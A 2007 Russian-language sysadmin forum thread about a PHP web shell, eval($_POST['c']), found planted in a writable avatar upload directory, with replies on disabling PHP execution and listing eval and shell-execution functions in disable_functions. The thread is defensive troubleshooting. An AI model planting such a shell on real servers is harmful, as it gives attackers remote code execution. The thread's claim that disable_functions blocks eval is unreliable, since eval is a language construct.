Apache и php_engine

И всё прочее, что касается HTML
Правила форума
Убедительная просьба юзать теги [code] при оформлении листингов.
Сообщения не оформленные должным образом имеют все шансы быть незамеченными.
Аватара пользователя
dstol
рядовой
Сообщения: 41
Зарегистрирован: 2007-10-10 7:58:43
Контактная информация:

Apache и php_engine

Непрочитанное сообщение dstol » 2007-11-09 10:09:58

Хакеры ломают. Нашли уязвимость в каком то из скриптов. В каталоге где лежат аватары пользователей
появляются скрипты *.php с кодом типа

Код: Выделить всё

<?php
  eval($_POST['c']);
  exit();
?>
Владелец файлов mysql :shock:. Права на эту директорию 777. С другими не пройдет uploading.
Сам скрипт uploading'a проверял. Через него не могли потому что все файлы обрабатываются gd.
Пока найду дырку может пройти много времени Слышал что можно отключить выполнение скриптов php для определенной директории с помощью директивы php_value php_engine off. Попробовал
кинуть .htaccess в директорию для uploading'а и прописал в нем

Код: Выделить всё

php_value php_engine off
AllowOverride on
Скрипты не выполняються. Но и uploading не работает. Плиз помогите разобраться со злостными парнями.
Последний раз редактировалось dstol 2007-11-13 10:19:02, всего редактировалось 1 раз.

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35462
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: Apache и php_engine

Непрочитанное сообщение Alex Keda » 2007-11-09 11:54:01

таки мусю поломали...
а не пхп...
Убей их всех! Бог потом рассортирует...

Аватара пользователя
dstol
рядовой
Сообщения: 41
Зарегистрирован: 2007-10-10 7:58:43
Контактная информация:

Re: Apache и php_engine

Непрочитанное сообщение dstol » 2007-11-09 16:24:11

Скорее все нашли дыру mysql запросе. И сервер mysql записал результат запроса в файл. Пользователь
который подключается к базе имеет право на запись результатов запроса в файл. С его правами я
поделать ничего немогу (начальство пока не разрешает). Доступ ко многим php скриптам тоже ограничен
(Zend'ом закодированы). Нужно просто запретить выполнение скриптов из определенной директории

kmb
лейтенант
Сообщения: 680
Зарегистрирован: 2007-02-20 8:30:03
Контактная информация:

Re: Apache и php_engine

Непрочитанное сообщение kmb » 2007-11-09 23:43:14

в пхп.ини можно рубить конкретные функции, можешь отрубить eval и еще по-моему штуки 3-4 аналогичных...
truth is out there...

Аватара пользователя
BlackCat
прапорщик
Сообщения: 469
Зарегистрирован: 2007-10-16 22:40:42

Re: Apache и php_engine

Непрочитанное сообщение BlackCat » 2007-11-10 17:07:23

Код: Выделить всё

php_value php_engine off
Сработает если включен mod_php и через него идет обработка скриптов.
=====
В той директории, куда идет закачка, других пхп скриптов случайно нет? Может кроме зловредного скрипта, там еще и полезные лежат. Еще, как вариант, могли измениться права на диру.
=====
А для разборок со злостными парнями можно пропатчить их скрипт. Так что бы выдавалась ошибка "Неправильный синтаксис" и делалась запись в специальный лог с адресом нехороших пользователей и всей остальной информацией, которую можно собрать в т.ч. и запросом к скрипту.

P.S. Не забудте найти код через который вас поломали ;-)

Аватара пользователя
dstol
рядовой
Сообщения: 41
Зарегистрирован: 2007-10-10 7:58:43
Контактная информация:

Re: Apache и php_engine

Непрочитанное сообщение dstol » 2007-11-12 11:50:52

А каким образом отключить eval в php.ini. Все равно она нигде не используеться.

Аватара пользователя
BlackCat
прапорщик
Сообщения: 469
Зарегистрирован: 2007-10-16 22:40:42

Re: Apache и php_engine

Непрочитанное сообщение BlackCat » 2007-11-12 22:48:45

Вот, что пишут в мане:
disable_functions
Эта директива позволяет вам запретить некоторые функции из соображений безопасности. В качестве значения она принимает список функций, разделенных двоеточием. disable_functions не зависит от того, используется Защищенный режим или нет.
Эта директива должна быть указана в php.ini. Вы не можете использовать ее, например, в httpd.conf.
получается

Код: Выделить всё

disable_functions=eval
Для большей надежности можно отрубить:
system()
passthru()
exec()
shell_exec()
Все они выполняют команды в шеле.

Аватара пользователя
dstol
рядовой
Сообщения: 41
Зарегистрирован: 2007-10-10 7:58:43
Контактная информация:

Re: Apache и php_engine

Непрочитанное сообщение dstol » 2007-11-13 10:21:00

Спасибо. Помогло. Отрубил функции и все ok :)